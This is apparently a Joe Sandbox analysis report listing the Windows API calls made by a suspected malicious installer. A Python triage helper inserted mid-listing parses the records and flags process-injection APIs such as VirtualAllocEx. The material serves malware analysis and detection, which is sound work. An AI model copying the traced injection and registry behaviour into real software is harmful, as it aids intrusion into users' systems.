                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                  • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                  • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                  • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                  • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                  • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                  • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                  APIs
                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                  • String ID:
                                                  • API String ID: 1938659011-0
                                                  • Opcode ID: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                  • Instruction ID: c1865f8cc46f1228928c2992524d711605dd36016a3aefe194dc66e9efe750da
                                                  • Opcode Fuzzy Hash: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                  • Instruction Fuzzy Hash: 24F08231705201DBCB20DF769D04A9BBFA4EF91354B10803BE145F6190D6788502CA68
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                  • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                  • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                  • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                    • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                    • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                  • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                  • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                  • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                  • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                  • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                  • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                  • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                  • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                  • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 6FEB2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                   • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: b484f0552789ab6faf5cbfc55fb5d8f5f15e511610e26b03c69526561770ffcf
                                                  • Instruction ID: 7e5a3b6b352edc32424b8baa7c4f8f7e8dc25c9675b961b0fc772966150dc576
                                                  • Opcode Fuzzy Hash: b484f0552789ab6faf5cbfc55fb5d8f5f15e511610e26b03c69526561770ffcf
                                                  • Instruction Fuzzy Hash: A7415072504705DFDF129FA4DB84B593F75FF26328F30442EE508DA2A0DB34A8518B92
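The VirtualAllocEx record above is the one call in this listing that sits outside the main image (image base 6FEB0000 rather than 00400000), which is where an analyst reading the "Executed Functions" section first wants to look when the report also flags mapping memory into another process. The following helper, an added example and not Joe Sandbox's or the sample author's code, parses function records in exactly this page's layout (APIs, Memory Dump Source, Similarity), keeps the "Part of subcall function" attribution, and reports which image base each injection-style API was called from. The excerpt it parses is constructed from two of the records on this page; the injection API watchlist is the analyst's own assumption, not something the report states.

```python
"""Triage helper for Joe Sandbox "Executed Functions" listings (added example).

Parses per-function records (APIs / Memory Dump Source / Similarity) into
structured form, then answers two questions an analyst asks when a report
flags process injection: which loaded image calls the injection primitives,
and which functions resolve their imports at runtime via GetProcAddress.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt mirroring the report layout: two records from this page.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
• GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
  • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
Memory Dump Source
• Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• API String ID: 2547128583-0
APIs
• VirtualAllocEx.KERNELBASE(00000000), ref: 6FEB2AF7
Memory Dump Source
• Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
Similarity
• API ID: AllocVirtual
• API String ID: 4275171209-0
"""

# One API line: optional subcall attribution, Name.MODULE(args), ref: hex.
# The argument list is optional because some entries (e.g. wsprintfA.USER32) lack it.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)",
    re.IGNORECASE,
)
OFFSET_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-F]+)", re.IGNORECASE)

# Assumed watchlist (analyst's choice, not from the report): APIs used to place
# and run code in another process.
INJECTION_APIS = {
    "VirtualAllocEx", "WriteProcessMemory", "NtWriteVirtualMemory", "NtMapViewOfSection",
    "CreateRemoteThread", "QueueUserAPC", "NtQueueApcThread", "SetThreadContext",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # address of the call site
    via_subcall: int | None = None  # callee that actually issues the call, if attributed


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    image_base: int | None = None  # "Offset:" of the dump the function was lifted from
    api_id: str = ""
    api_string_id: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; a record starts at 'APIs', or at
    'Memory Dump Source' when the current record already has a dump source
    (records without API calls carry no 'APIs' header)."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.image_base is not None)):
            cur = FunctionRecord()
            records.append(cur)
        if cur is None:
            continue
        if line in ("APIs", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"):
            section = line
            continue
        if section == "APIs" and (m := API_RE.search(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            caller = int(m["caller"], 16) if m["caller"] else None
            cur.calls.append(ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16), caller))
        elif section == "Memory Dump Source" and cur.image_base is None and (m := OFFSET_RE.search(line)):
            cur.image_base = int(m["base"], 16)
        elif section == "Similarity" and line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif section == "Similarity" and line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
    return records


def flag_injection_primitives(records: list[FunctionRecord]) -> dict[int | None, list[tuple[str, int]]]:
    """Map image base -> [(api, call-site address)] for watchlisted calls."""
    hits: dict[int | None, list[tuple[str, int]]] = {}
    for rec in records:
        for call in rec.calls:
            if call.name in INJECTION_APIS:
                hits.setdefault(rec.image_base, []).append((call.name, call.ref))
    return hits


def dynamic_resolution_records(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Records that resolve imports at runtime, hiding them from the static import table."""
    return [rec for rec in records if any(c.name == "GetProcAddress" for c in rec.calls)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, calls in flag_injection_primitives(recs).items():
        print(f"image {base:08X}: " + ", ".join(f"{n}@{ref:08X}" for n, ref in calls))
    for rec in dynamic_resolution_records(recs):
        print(f"runtime import resolution in image {rec.image_base:08X} ({rec.api_id})")
```

Run it against a report saved as text to get the same grouping for every record; the point of keying on the dump "Offset:" is that a module loaded into the installer process at a separate base (here 6FEB0000) is the place to pull the dump from and disassemble first, rather than the main image at 00400000.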
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID:
                                                  • API String ID: 2111968516-0
                                                  • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                  • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                  • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                  • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                  APIs
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                  • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                  • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                  • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  APIs
                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PathSearch
                                                  • String ID:
                                                  • API String ID: 2203818243-0
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(6FEB404C,00000004,00000040,6FEB403C), ref: 6FEB293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
